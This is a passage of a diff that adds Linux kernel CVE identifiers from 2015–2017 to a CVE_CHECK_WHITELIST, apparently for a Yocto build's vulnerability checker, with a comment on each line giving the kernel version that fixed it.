+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1350"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1420"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1421"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1465"
+
+# fixed-version: Fixed after version 3.19rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1573"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1593"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1805"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2041"
+
+# fixed-version: Fixed after version 3.19
+CVE_CHECK_WHITELIST += "CVE-2015-2042"
+
+# fixed-version: Fixed after version 4.0rc4
+CVE_CHECK_WHITELIST += "CVE-2015-2150"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2666"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2672"
+
+# fixed-version: Fixed after version 4.0rc6
+CVE_CHECK_WHITELIST += "CVE-2015-2686"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2830"
+
+# CVE-2015-2877 has no known resolution
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2922"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2925"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3212"
+
+# fixed-version: Fixed after version 2.6.33rc8
+CVE_CHECK_WHITELIST += "CVE-2015-3214"
+
+# fixed-version: Fixed after version 4.2rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3288"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3290"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3291"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2015-3331"
+
+# Skipping CVE-2015-3332, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3339"
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3636"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4001"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4002"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4003"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4004"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4036"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4167"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2015-4170"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4176"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4177"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4178"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4692"
+
+# fixed-version: Fixed after version 4.1rc6
+CVE_CHECK_WHITELIST += "CVE-2015-4700"
+
+# fixed-version: Fixed after version 4.2rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5156"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5157"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5257"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5283"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5307"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5327"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5364"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5366"
+
+# fixed-version: Fixed after version 4.2rc6
+CVE_CHECK_WHITELIST += "CVE-2015-5697"
+
+# fixed-version: Fixed after version 4.1rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5706"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5707"
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-6252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6526"
+
+# CVE-2015-6619 has no known resolution
+
+# CVE-2015-6646 has no known resolution
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6937"
+
+# Skipping CVE-2015-7312, no affected_versions
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7509"
+
+# fixed-version: Fixed after version 4.4rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7513"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7515"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-7550"
+
+# Skipping CVE-2015-7553, no affected_versions
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2015-7566"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7613"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7799"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7833"
+
+# Skipping CVE-2015-7837, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7872"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7884"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7885"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7990"
+
+# Skipping CVE-2015-8019, no affected_versions
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8104"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8215"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8324"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8374"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8539"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8543"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8550"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8551"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8552"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8553"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8569"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8575"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8660"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8709"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8746"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8767"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-8785"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8787"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8812"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8816"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8830"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8839"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8844"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8845"
+
+# Skipping CVE-2015-8937, no affected_versions
+
+# Skipping CVE-2015-8938, no affected_versions
+
+# Skipping CVE-2015-8939, no affected_versions
+
+# Skipping CVE-2015-8940, no affected_versions
+
+# Skipping CVE-2015-8941, no affected_versions
+
+# Skipping CVE-2015-8942, no affected_versions
+
+# Skipping CVE-2015-8943, no affected_versions
+
+# Skipping CVE-2015-8944, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-8950"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8952"
+
+# fixed-version: Fixed after version 4.3
+CVE_CHECK_WHITELIST += "CVE-2015-8953"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8955"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8956"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8961"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8962"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2015-8963"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8964"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-8966"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8967"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8970"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-9004"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9016"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9289"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0617"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-0723"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0728"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-0758"
+
+# Skipping CVE-2016-0774, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0821"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2016-0823"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10044"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10088"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-10147"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-10150"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10153"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10154"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10200"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10208"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10229"
+
+# fixed-version: Fixed after version 4.8rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10318"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10723"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10741"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10764"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10905"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10906"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10907"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-1237"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1575"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1576"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-1583"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2053"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2069"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2016-2070"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2085"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2117"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-2143"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2184"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2185"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2186"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2187"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2188"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2383"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2384"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2543"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2544"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2545"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2546"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2547"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2548"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2549"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2550"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2782"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2847"
+
+# Skipping CVE-2016-2853, no affected_versions
+
+# Skipping CVE-2016-2854, no affected_versions
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3044"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3070"
+
+# fixed-version: Fixed after version 4.6rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3134"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3135"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3136"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3137"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3138"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3139"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3140"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3156"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3157"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3672"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3689"
+
+# Skipping CVE-2016-3695, no affected_versions
+
+# Skipping CVE-2016-3699, no affected_versions
+
+# Skipping CVE-2016-3707, no affected_versions
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3713"
+
+# CVE-2016-3775 has no known resolution
+
+# CVE-2016-3802 has no known resolution
+
+# CVE-2016-3803 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2016-3841"
+
+# fixed-version: Fixed after version 4.8rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3857"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3951"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3955"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-3961"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4440"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4470"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4482"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4485"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4486"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4557"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4558"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4565"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4568"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4569"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4578"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4580"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4581"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4794"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4805"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4913"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4951"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4997"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4998"
+
+# fixed-version: Fixed after version 4.9rc2
+CVE_CHECK_WHITELIST += "CVE-2016-5195"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5243"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5244"
+
+# Skipping CVE-2016-5340, no affected_versions
+
+# Skipping CVE-2016-5342, no affected_versions
+
+# Skipping CVE-2016-5343, no affected_versions
+
+# Skipping CVE-2016-5344, no affected_versions
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5400"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5412"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5696"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5728"
+
+# fixed-version: Fixed after version 4.7rc6
+CVE_CHECK_WHITELIST += "CVE-2016-5828"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-5829"
+
+# CVE-2016-5870 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-6130"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6136"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6156"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-6162"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6187"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6197"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-6198"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6213"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6327"
+
+# fixed-version: Fixed after version 4.8rc3
+CVE_CHECK_WHITELIST += "CVE-2016-6480"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6516"
+
+# Skipping CVE-2016-6753, no affected_versions
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6786"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6787"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2016-6828"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7039"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-7042"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7097"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7117"
+
+# Skipping CVE-2016-7118, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7425"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7910"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7911"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-7912"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7913"
+
+# fixed-version: Fixed after version 4.6rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7914"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7915"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7916"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-7917"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-8399"
+
+# Skipping CVE-2016-8401, no affected_versions
+
+# Skipping CVE-2016-8402, no affected_versions
+
+# Skipping CVE-2016-8403, no affected_versions
+
+# Skipping CVE-2016-8404, no affected_versions
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8405"
+
+# Skipping CVE-2016-8406, no affected_versions
+
+# Skipping CVE-2016-8407, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8630"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8632"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8633"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8636"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8645"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8646"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8650"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8655"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8658"
+
+# CVE-2016-8660 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8666"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9083"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9084"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9120"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9178"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9191"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-9313"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9555"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-9576"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9588"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9604"
+
+# Skipping CVE-2016-9644, no affected_versions
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9685"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9754"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9755"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9756"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9777"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9793"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9794"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9806"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9919"
+
+# Skipping CVE-2017-0403, no affected_versions
+
+# Skipping CVE-2017-0404, no affected_versions
+
+# Skipping CVE-2017-0426, no affected_versions
+
+# Skipping CVE-2017-0427, no affected_versions
+
+# CVE-2017-0507 has no known resolution
+
+# CVE-2017-0508 has no known resolution
+
+# Skipping CVE-2017-0510, no affected_versions
+
+# Skipping CVE-2017-0528, no affected_versions
+
+# Skipping CVE-2017-0537, no affected_versions
+
+# CVE-2017-0564 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0605"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0627"
+
+# CVE-2017-0630 has no known resolution
+
+# CVE-2017-0749 has no known resolution
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0750"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-0786"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-0861"
+
+# fixed-version: Fixed after version 4.13rc5
